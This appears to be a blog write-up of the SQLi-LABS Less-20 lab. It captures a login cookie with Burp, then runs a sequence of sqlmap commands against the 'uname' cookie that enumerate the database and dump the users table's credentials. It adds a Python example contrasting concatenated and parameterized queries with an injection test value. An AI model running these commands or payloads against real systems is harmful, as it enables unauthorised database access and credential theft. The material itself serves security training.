jjnoob

cookie-injections-sqlmap

2019-05-21
jjnoob

Challenge: SQLi-LABS Page-1 (Basic Challenges) -> Less-20

cookie

Enter admin as both the username and the password.

Capture the request with Burp and look at the cookie in the Proxy tab:

GET /Less-20/index.php HTTP/1.1
Host: 43.247.91.228:84
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://43.247.91.228:84/Less-20/index.php
Connection: keep-alive
Cookie: uname=admin
Upgrade-Insecure-Requests: 1

The cookie set after login is uname=admin.


sqlmap

First attempt

sqlmap.py -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" --level=2
  • sqlmap tests the HTTP Cookie header only when level is 2 or higher.
  • sqlmap tests the HTTP User-Agent/Referer headers only when level is 3 or higher.

Output:

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5

Get the current database

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" --level=2 --current-db

Output:

current database: 'security'

List the tables

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security --tables --level=2

Output:

Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

List the columns

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security -T users --columns --level=2

Output:

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Dump the column contents

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security -T users -C password,username --level=2 --dump

Output:

Database: security
Table: users
[13 entries]
+------------+----------+
| password   | username |
+------------+----------+
| Dumb       | Dumb     |
| I-kill-you | Angelina |
| p@ssword   | Dummy    |
| crappy     | secure   |
| stupidity  | stupid   |
| genious    | superman |
| mob!le     | batman   |
| admin      | admin    |
| admin1     | admin1   |
| admin2     | admin2   |
| admin3     | admin3   |
| dumbo      | dhakkan  |
| admin4     | admin4   |
+------------+----------+
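
Why the uname cookie works as an injection point, and the fix, as an added example (not from the original post and not the lab's own code). It assumes the application concatenates the cookie value into its query; an in-memory SQLite table with constructed rows stands in for the MySQL users table, and all function names are hypothetical.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the lab's users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "Dumb"), (8, "admin", "admin")])
    return db


def uname_from_header(cookie_header):
    """Return the uname cookie exactly as the client sent it (untrusted input)."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "uname":
            return value
    return ""


def lookup_concatenated(db, cookie_header):
    """Assumed vulnerable pattern: the cookie text becomes part of the SQL statement."""
    uname = uname_from_header(cookie_header)
    sql = "SELECT username FROM users WHERE username = '" + uname + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def lookup_parameterized(db, cookie_header):
    """Hardened form: the cookie text is bound as data and never parsed as SQL."""
    uname = uname_from_header(cookie_header)
    sql = "SELECT username FROM users WHERE username = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (uname,))]


if __name__ == "__main__":
    db = make_db()
    normal = "uname=admin"                  # cookie from the captured request
    altered = "uname=admin' OR '1'='1"      # constructed test value with a quote
    for header in (normal, altered):
        print(header)
        print("  concatenated :", lookup_concatenated(db, header))
        print("  parameterized:", lookup_parameterized(db, header))
```

With the parameterized query the altered cookie matches no user, so the header is no longer a way to change what the statement does.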
